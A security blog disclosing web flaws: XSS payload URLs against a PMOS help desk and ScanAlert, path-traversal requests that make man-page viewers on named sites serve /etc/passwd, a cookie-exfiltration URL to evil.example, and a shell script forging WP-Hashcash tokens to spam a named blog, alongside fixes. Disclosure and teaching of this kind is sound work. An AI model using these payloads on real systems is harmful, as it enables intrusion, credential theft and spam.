Seth Woolley's Blog

Occasional Musings

anatomy of a typical XSS problem with user logins and cookies

Synopsis

I keep seeing the same stupid login/authentication cross-site scripting mistake over and over, so I thought I'd write it up to remind everybody what not to do.

Background


PMOS a POS

Check out the pmos help desk, here:

http://www.h2desk.com/pmos/demo/login.php

Looks normal.  Only a couple of fields to enter data into, right?  Not quite: there's a variable that we don't see right away.

Click on a link in the header that looks like it might require authentication, say, the "Browse" link, like this:

http://www.h2desk.com/pmos/demo/browse.php

The PHP is smart enough to know you haven't logged in yet.  So what does it do?  It says, hey, I need you to log in, so I'm going to send you to the login page.  BUT, as an added convenience, I'm going to tell the login page to send you back when you're done, like this:

http://www.h2desk.com/pmos/demo/login.php?redirect=browse.php

Isn't that nifty.  Yes and no.  Yes, it's a cool design improvement; no, because it's another form of input into the system -- one that isn't so carefully guarded, because it'll never hit the SQL layer.

An unsanitary problem

Let's download their source code and take a look at how they implemented it.  I just went to http://www.h2desk.com/pmos/, clicked http://www.h2desk.com/pmos/pmos214.zip, and opened up login.php.  (Ignore their statement, "Also, please read the GPL license thoroughly. By no means can you use this code (or any of it) in your own product and sell it as your own -- that is completely illegal and will be prosecuted."  This is false: the GPL lets you charge whatever you want for the software, so long as you preserve the license and copyright notices and pass on the source.)

<form action="<?php echo $HD_CURPAGE ?>" method="post">
  <input type="hidden" name="cmd" value="login" />
  <input type="hidden" name="redirect" value="<?php echo ($_GET[redirect] != "" ) ? $_GET[redirect] : $_POST[redirect]; ?>">
  <tr><td><label for="email">Email: </td><td><input type="text" name="email" size="30" value="<?= $_POST[email] ?>" /></label></td></tr>
 <tr><td><label for="password">Password: </td><td><input type="password" name="password" size="30" /></label></td></tr>
 <tr><td><br /><input type="submit" value="Login" /></td></tr>
</form>

Ouch!  No sanitization whatsoever.  They let you do pretty much whatever you want before you log in (not so dangerous by itself).  Let's note the first problem in this code:

http://www.h2desk.com/pmos/demo/login.php?redirect=%22%3E%3Cscript%3Ealert(location.href)%3C/script%3E%3Ca

(Note that the email input field is also XSSable, but via the POST method.)

It puts that directly into the hidden field for the redirect, without sanitization -- classic XSS.  Not so big a deal on its own: if you're on the login page, your cookies probably aren't there to steal yet, provided the site uses well-implemented session-only cookies -- which this one doesn't (it lets them live for a whole month):
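The fix here is plain output escaping: PHP's htmlspecialchars() with ENT_QUOTES is the canonical tool.  Here's a minimal sketch of the same idea in Python (the helper function is my own illustration, not PMOS code):

```python
import html

def hidden_field(name, value):
    # Escape &, <, > and both quote characters so user input cannot
    # break out of the attribute value and inject markup.
    return '<input type="hidden" name="{}" value="{}">'.format(
        html.escape(name, quote=True), html.escape(value, quote=True))

# The payload from the URL above, rendered harmless:
payload = '"><script>alert(location.href)</script><a'
print(hidden_field("redirect", payload))
```

The injected quote becomes &quot; and the angle brackets become &lt;/&gt;, so the browser renders them as text instead of markup.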

setcookie( "iv_helpdesk_login", $_POST[email], time( ) + 2592000 );
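A more defensive pattern is a session-only cookie with the HttpOnly flag: no Expires/Max-Age, so it dies with the browser, and HttpOnly, so injected script can't read it through document.cookie.  A sketch with Python's http.cookies (the cookie name is borrowed from PMOS purely for illustration):

```python
from http.cookies import SimpleCookie

def session_cookie(name, value):
    # No expires/max-age attribute: the cookie lasts only as long as
    # the browser session, instead of PMOS's month.
    c = SimpleCookie()
    c[name] = value
    c[name]["path"] = "/"
    c[name]["httponly"] = True  # invisible to document.cookie
    return c[name].OutputString()

print(session_cookie("iv_helpdesk_login", "someuser"))
```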

Exploit


Delivering the payload

If you need to inject code where quotes aren't allowed (because magic quotes are enabled, for example), you can use the document.referrer property and set up your own site to serve two different sets of data -- one intended for the client, another for the server -- so that when the server fetches it, it gets the needed payload.

Here's a way that just decodes part of the URL for the payload, avoiding magic quotes altogether:

http://www.h2desk.com/pmos/demo/login.php?redirect=%22%3E%3Cscript%3Ealert(decodeURI(location.href.substr(132)))%3C/script%3E%3Ca&s=This%20is%20the%20payload

(Tricks like this are why javascript should die.)
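The substring trick above can be sketched outside the browser too.  Here it is in Python, with urllib.parse.unquote standing in for JavaScript's decodeURI and a search replacing the hard-coded offset 132 (the href string is a shortened stand-in for the real URL):

```python
from urllib.parse import unquote

# A stand-in for location.href: the injected <script> itself contains
# no quote characters; the payload rides along in an extra query
# parameter and is only decoded at runtime on the victim's side.
href = ("http://www.h2desk.com/pmos/demo/login.php"
        "?redirect=%22%3E%3Cscript%3E...%3C/script%3E%3Ca"
        "&s=This%20is%20the%20payload")

# Equivalent of location.href.substr(132), minus the magic number:
payload = unquote(href[href.index("&s=") + 3:])
print(payload)  # This is the payload
```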

It gets worse from here

if( trim( $_POST[redirect] ) != "" )
  $redirect = $_POST[redirect];
else
  $redirect = $HD_URL_BROWSE;

$EXTRA_HEADER = "<meta http-equiv=\"refresh\" content=\"1; URL={$redirect}\" />";
$msg = "<div class=\"successbox\">Login successful.  Redirecting you now.  Click <a href=\"{$redirect}\">here</a> if you aren't automatically forwarded...</div>";

$do_redirect = 1;

Yep, they let you inject code _after_ login has succeeded.  So if you want to make sure you get their auth data, just let them log in first before activating your payload (which you could carry over via document.referrer instead of document.location if it's not an encrypted link)!

Note that magic quotes _must_ be enabled for pmos to work at all.
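Beyond escaping the value on output, the deeper fix is to refuse to redirect anywhere but a known local page.  A minimal allowlist sketch in Python (the page names are illustrative, not PMOS's actual page list):

```python
# Hypothetical allowlist of local pages a login may bounce back to.
ALLOWED_PAGES = {"browse.php", "view.php", "index.php"}

def safe_redirect(target, default="browse.php"):
    # Anything not on the list -- absolute URLs, quotes, markup --
    # silently falls back to the default page.
    return target if target in ALLOWED_PAGES else default

print(safe_redirect("browse.php"))
print(safe_redirect('"><script>alert(1)</script>'))
```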

Magic quotes and SQL

Furthermore, it's littered with magic-quotes-expecting SQL queries like:

$res = mysql_query( "SELECT * FROM {$pre}user WHERE ( email = '$_POST[email]' && password = '$_POST[password]' )" );

OUCH!
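The cure for this whole class of bug is to keep data out of the SQL string entirely.  Modern PHP would use PDO prepared statements; here's the same idea sketched with Python's sqlite3 (illustrative schema):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE user (email TEXT, password TEXT)")
db.execute("INSERT INTO user VALUES ('a@example.com', 'secret')")

def login(email, password):
    # The driver binds the values to the ? placeholders, so a quote
    # in the input can never terminate the SQL string literal.
    row = db.execute(
        "SELECT * FROM user WHERE email = ? AND password = ?",
        (email, password)).fetchone()
    return row is not None

print(login("a@example.com", "secret"))       # legitimate login
print(login("a@example.com", "' OR '1'='1"))  # injection attempt fails
```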

Conclusion

Yeah, stay away from the h2desk pmos code (no idea about their commercial offering, though); it's not a good example of quality, secure code.

Seth Woolley's Blog webdevel security

scanalert

Recruitment

A couple weeks ago I received an email from the http://scanalert.com recruiter, who saw my resume and invited me to interview at ScanAlert.  I emailed back and called the recruiter the next day to see what the position entailed.  It was for their "ethical hacker / penetration tester" position, which is still posted on their website.  I was curious, so, having never worked in a "corporate" security environment -- only for smaller businesses -- I thought I'd see what it's like there.  I talked to the Vice President of Engineering, Ben Tyler, and he offered a challenge on a fake website:

In our fictitious web site, one or more of the following
vulnerabilities may exist:

Cross Site Scripting
SQL Injection
Directory Listing
Path Disclosure

They wanted me to send an IP address back so they could open up the URL to me for 24 hours.  But before I did that, I was bothered by their apparent "find all the vulnerabilities and slap a sticker declaring it safe" mentality, so I took a look at their own website, and within a few minutes happened upon an interesting XSS vulnerability that let me inject HTML attributes into a link.

https://www.scanalert.com/Link?url=http://scanalert.com%22+onclick=%22alert('hi');

Response

I replied back with the following:

Hi Ben,

In reaction to your challenge to break into a fictitious website, I
must challenge you to secure your own website:

<XSS exploit url here>

When your recruiter contacted me for a position as a Professional /
Ethical Hacker / Penetration Tester, I was curious about the idea of
being employed by scanalert, however, I have had some doubts when you
said "find the vulnerabilities".  The use of a definite article led me
to believe that there might be a culture of "finding all the
vulnerabilities" in websites, declaring them secure, and then slapping
stickers on them.  There is no question as to the value of security
auditing, but it is just that, an audit, not a guarantee.  Questioning
the efficacy of such a culture, I decided to test its value by checking
your website for basic vulnerabilities.  In a matter of minutes I
discovered the above vulnerability.  The "Hacker Safe" concept should be
thought of as "Hacker Safer".

Now, I do acknowledge that perhaps I read too much into your wording
and that indeed, a culture of progressive security may yet exist at
scanalert, so I'm still interested in pursuing this position, but I need
some reassurance that a culture of asymptotic security thrives at
scanalert, that the Hacker Safe logo really means, internally,
Hacker Safer, and that I too will be able to gain progressive experience
in novel and interesting security techniques while employed at
scanalert.

Seth

Confirmation

No reply came back, but five days later I noticed they had fixed it -- poorly.  The following link still worked:

https://www.scanalert.com/Link?url=javascript:alert('hi');

For a security website, I was disappointed that they couldn't fix the entire vulnerability, so I looked around for a few more vulns and sent them a more detailed report listing more things they probably wouldn't want their code to be doing, including an information leakage vulnerability and how their login form works well with XSS vulns to escalate privileges automatically.

Five days later again, they still haven't completely fixed the vulnerability, so I'm publishing this blog entry to expose their inability to manage their own security.

Seth Woolley's Blog webdevel reallife security

man-pages.net exploitable too

Update

When will they ever learn?

Exploit

http://www.ctssn.com/man/index.cgi?section=all&topic=%2Fetc%2Fpasswd
http://www.ctssn.com/man/index.cgi?topic=./index.cgi
http://www.ctssn.com/man/index.cgi?topic=man

As always, if only they'd read their own manual page...

Update: I looked into this site again to try to craft a vulnerability report:

http://www.ctssn.com/man/index.cgi?section=all&topic=/home/aaron/www/ctssn.com/html/man/index.cgi

Analysis

And their isquestionable string is not the same as the one included on the CPAN website, yet the modified date is back in '97.  They are using the latest version of man2html, though: 3.0.1.

Perhaps man.cgi has been updated and many bad man.cgi copies are still floating around, or the source code was fixed without changing the modified date in the tarball.

This is an odd development.  It seems every site I run into running this code is flawed -- why would there be so many flawed sites created after the last modified date?

Seth Woolley's Blog webdevel security

XSS not a security problem?

Critique

Slashdot carried a link to an armchair security "institution" (why make up a corny name for yourself, call it your company blog, and expect kudos? Just blog under your own name!) that makes this claim:

http://neosmart.net/blog/archives/194

"It is *of the utmost importance* to note that a page that has an XSS vulnerablity is no /more dangerous/ than visiting a random result generated by a Google search - something that users do all the time."

This is quite false.  He correctly identifies the first problem -- the social engineering an XSS URL may enable (though why he doesn't consider this "more dangerous" is beyond me) -- but he misses the second: since the XSS is on the actual host, the JavaScript runs with that site's privileges for cookie access.  This lets an attacker trivially steal any of that site's cookies.

His article is thus flagrantly ignorant, and it should simply be ignored.  Everybody in the know already agrees that JavaScript is a gaping security hole and that people shouldn't be running it all the time.  While he gives credit to those trying to get JavaScript eliminated from the web, he discredits them by misrepresenting XSS's risk in a twisted argument meant to elevate the problems with JavaScript.

One might argue that this only strengthens his point that JavaScript sucks, because JavaScript is the very thing that enables the problem with cookies and XSS.  But he should have simply argued _that_ and improved his case.  As it stands, his title is simply too false to have a lasting impact, despite the merits of his goal.
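To make the elevated-privilege point concrete: script injected via XSS runs in the vulnerable site's origin, so document.cookie is readable, and one line ships it off-site.  Simulated here in Python (evil.example is a hypothetical attacker host; in a browser this would be one line of JavaScript, e.g. new Image().src = ...):

```python
from urllib.parse import quote

def exfil_url(cookies):
    # Build the URL an injected payload would request to smuggle the
    # victim's cookies to an attacker-controlled host.
    return "http://evil.example/steal?c=" + quote(cookies, safe="")

# In a real attack the argument would be document.cookie:
print(exfil_url("iv_helpdesk_login=victim"))
```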

Seth Woolley's Blog webdevel security

mozilla finally fixes security issue

Exploit

I reported this security issue three years ago:

https://bugzilla.mozilla.org/show_bug.cgi?id=226495

Resolution

Looks like they decided it was time to fix it after getting a duplicate report from somebody at Stanford.

Thanks Mozilla!

Seth Woolley's Blog webdevel security

another man viewer dumb

Synopsis

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=man

Read the paragraph that reads:

        However,  if  name  contains  a slash (/) then man
interprets it as a file specification, so that you can  do
man ./foo.5 or even man /cd/foo/bar.1.gz.

Description

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/passwd

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/httpd/conf/httpd.conf

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/var/www/cgi-bin/man2html

Looks like there was an attempt to sanitize cgi_section but not cgi_command.  It also looks like the script was hacked on a bit; the sanitization may have been there once and removed later.
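Every man-viewer hole in these posts has the same one-line fix: refuse anything that isn't a bare page name before handing it to man.  A sketch in Python (the exact character class is my choice, not the script's):

```python
import re

def safe_topic(topic):
    # A manual page name: letters, digits, dot, dash, underscore.
    # Anything containing a slash is rejected outright, so man can
    # never be coaxed into rendering /etc/passwd or the CGI itself.
    if not re.fullmatch(r"[A-Za-z0-9._-]+", topic):
        raise ValueError("not a manual page name")
    return topic

print(safe_topic("man"))
```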

Seth Woolley's Blog webdevel security

dns blacklists, spam control, and net neutrality

Critique

On four occasions in the past month I've sent email and had it bounce back due to DNS blacklists (specifically SORBS), since I send email from a cable modem range.  The four instances were:

  • A university in Greece, while sending email to a professor.
  • A university in the Czech Republic, another to a professor.
  • A smaller email service provider to another Source Mage developer.
  • A custom email service provider in Portland.  I re-sent the email from another account, but received no reply either.

What particularly disturbs me is that these blacklists don't merely block based on a series of factors, but on an entire class of users.  The whole debate about a neutral net has broken down within the email system.  Users who can administer their own boxes have no way out of the SORBS blacklist, even by request.  SORBS thus exists only to serve corporate interests who want to Balkanize the net into classes of "pay extra" and "users who shall have no democratizing force".

If a user wants to use a blacklist, that's fine.  But most of these people having their email blacklisted have no idea what is going on.

More thoughts on blacklists can be found here:

http://www.faqs.org/ftp/internet-drafts/draft-church-dnsbl-harmful-01.txt

Example

In one case, I was attempting to notify someone of a security vulnerability in some of their code.  The IT department of the university is responsible for this blacklisting, and they are also directly responsible for the security of said network; since I have no way to communicate with them, I will simply publish the results here for all to see:

http://swoolley.org/man.cgi/man

Read the first paragraph -- it points out that arguments containing a / are interpreted as files.  My own manual page viewer does not have this problem, because I knew man had this behavior.

http://www.softlab.ntua.gr/cgi-bin/man-cgi?man

Oddly, no mention is made in the above manual.

Exploit

http://www.softlab.ntua.gr/cgi-bin/man-cgi?/etc/passwd

So we can do something like the above URL -- the author had no idea it did that, despite this package being a rewrite.

I sent the author an email notifying him of this, but SORBS blacklisted my email.  Thanks to SORBS, you all have first disclosure.

Seth Woolley's Blog politics security

sourcemage conversion of md5 to sha512 95% complete

Update

I've spent the last few days mangling the entire grimoire over to the new unpack_file API for validating sources using high bit hashes:

http://wiki.sourcemage.org/Source_Integrity_Checking_Standards

A few sed and perl scripts, plus waiting for the SCM to resolve changes between integrates, and now it's mostly done.  I have a few leftover spells whose source files I no longer have, so I wasn't able to regenerate the proper SHA512 hashes for them.

In other news, now I'm third place in the grimoire bullet rankings: http://smgl.positivism.org:8080/files/smgl-credits

Seth Woolley's Blog sourcemage security

hashsum patched for 64-bit

Update

In addition to some other 64-bit porting I've done, I've just finished porting hashsum over to 64-bit so it can be compiled on x86_64 architecture (AMD Opteron and Athlon 64 chips as well as Intel Xeon EM64T chips).

http://perforce.smee.org:8080/@@//sgl/grimoires/devel/crypto/hashsum/hashsum-64-bit.patch

Seth Woolley's Blog security

wordpress hashcash broken

Exploit

As a proof of concept, I wrote a shell script to break hashcash.  It works on the author's own blog:

#!/bin/sh
# Forge a WP-Hashcash token: the "proof of work" is just a value
# derived from the page, so a script can compute it as easily as
# the browser can.
AUTHOR='test'
EMAIL='test'
URL='test'
COMMENT='test'
SITE='http://elliottback.com/wp'
POST='/archives/2005/05/11/wordpress-hashcash-20/'
# Pull the post ID out of the comment form.
CPID="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep 'comment_post_ID' | cut -d'"' -f 14)"
# The hidden field's name is the MD5 of the form's onsubmit javascript.
MD5="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep '<form onsubmit' | cut -d"'" -f2 |
          tr -d '\n' | md5sum | cut -d' ' -f1)"
for i in 34; do  # change 34 to a list of guesses at the length of
                 # ABSPATH; it's 34 in this example
  wget --post-data="author=$AUTHOR&email=$EMAIL&url=$URL&comment=$COMMENT&submit=Submit+Comment&comment_post_ID=$CPID&$MD5=$(($CPID * $i))" \
    "$SITE/wp-comments-post.php"
done

He uses javascript "obfuscation" to make it hard for people to find his installs.  Just look for this string, which isn't obfuscated on any install:

(str){var bin=Array();var mask=(1<<8)-1;for(var i=0;i<str.length*8;i+=8)bin[i>>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;}

or just do this: ;)

http://www.google.com/search?q=%22Powered+by+WP-Hashcash%22

Elliott Back thinks people can't code around his obfuscation.  It's rather trivial to defeat -- and with an addition or two, this script could spam his site one post after another.  Determining the length of ABSPATH for a single site doesn't take long either, and once you have it, it's the same for all posts.  He appears to do some fancy "per-user" stuff, too, but a spammer isn't going to be "a user" or bother to become one.

Of course, you can also just "interpret" his JavaScript, as some spammers already do, but that can be more effort than it's worth.

Seth Woolley's Blog webdevel security

TrackBack and PingBack revisited

Update

A short while after TrackBack and PingBack were introduced, I wrote a blog entry entitled "The Problems with TrackBack and PingBack" in which I argued that both were a completely useless addition to the web and only worked to increase security risk by adding a plethora of complex code.

It turns out that I was correct.

http://news.netcraft.com/archives/2005/07/04/php_blogging_apps_vulnerable_to_xmlrpc_exploits.html

http://isc.sans.org/diary.php?date=2005-07-03

Rather than repeat what I wrote -- it has since been lost to a hard drive crash -- here's a good summary of what to do instead:

http://www.peej.co.uk/thinking/2004/10/trackback-pingpack

I wish I had a copy of what I wrote, as it predates that entry by six months, but that will have to suffice.

So in summary, please, disable trackback and pingback and use the existing methods we already have.

For clarification, the existing methods are:

  • for comment-aggregation, use a blog that lets users edit their own comments.  A "feature" of trackback is the "remote comment"; instead, post a link in your blog to the remote comment, or post a link in the remote blog back to your comment.  This prevents unneeded duplication as well.
  • for link-aggregation, use a referrer analyzer that validates the legitimacy of referrers.

Seth Woolley's Blog webdevel security